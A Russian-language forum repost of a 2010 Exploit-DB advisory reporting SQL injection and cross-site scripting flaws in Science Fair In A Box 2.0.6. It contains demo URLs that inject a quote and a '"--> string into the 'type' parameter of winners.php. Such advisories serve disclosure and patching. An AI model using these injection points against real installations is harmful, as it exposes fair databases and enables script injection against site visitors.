Exploit Science Fair In A Box - SQL Injection / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13801
Проверка EDB
  1. Пройдено
Автор
L0RD CRUSAD3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-5027 cve-2010-5026
Дата публикации
2010-06-09
Код:
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title: Science Fair In A Box SQLi & XSS Vulnerability
Version:2.0.6
Price:Free
Vendor url:http://www.sfiab.ca/
Published: 2010-06-09
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all
ICW members
###############################################################################################################################################################################################


Science Fair In A Box SQLi & XSS Vulnerability

Author: L0rd CrusAd3r aka VSN [[email protected]]

#####################################################################################################################################################################################################

Description:

The "Science Fair in a Box" (SFIAB) project provides regions hosting a
science fair with a complete and comprehensive package that can be used to
assist in the implementation and running of the fair.
The SFIAB provides a web based application to facilitate all areas of
running a science fair such as online registration for the participants,
judges, sponsor management, judge scheduling and awards management.
The SFIAB is implemented using open-source tools wherever possible, creating
a truly open and customizable product that fairs can modify to suit their
needs.
However, SFIAB contain enough configuration options to allow fairs to use
the system without any modifications to the underlying codebase. SFIAB is
developed using PHP, with MySQL as the backend database.
Other database backends could be supported in the future. All reports are
created in print-ready PDF format to ensure cross-platform compatibility
where applicable and also available to export as a CSV to external
applications.
All text in SFIAB is internationalized to allow the use of the system in any
language. 'Language Packs' will be available in other language once
translations are complete. (If you'd like to assist in translation, contact
us!)
SFIAB is the most advanced, most comprehensive Science Fair Software in the
world, and is used by many science fairs spread across many different
countries!
#######################################################################################################################################################################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL :http://server/sfiab/winners.php?year=2008&type=Special'

*XSS Vulnerability

Parameter:'"-->

DEMO URL :http://server/sfiab/winners.php?year=2008&type=Special [xss]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


##########################################################################################################################################################################################

-- 
With R3gards,
L0rd CrusAd3r
 
Источник
www.exploit-db.com

Похожие темы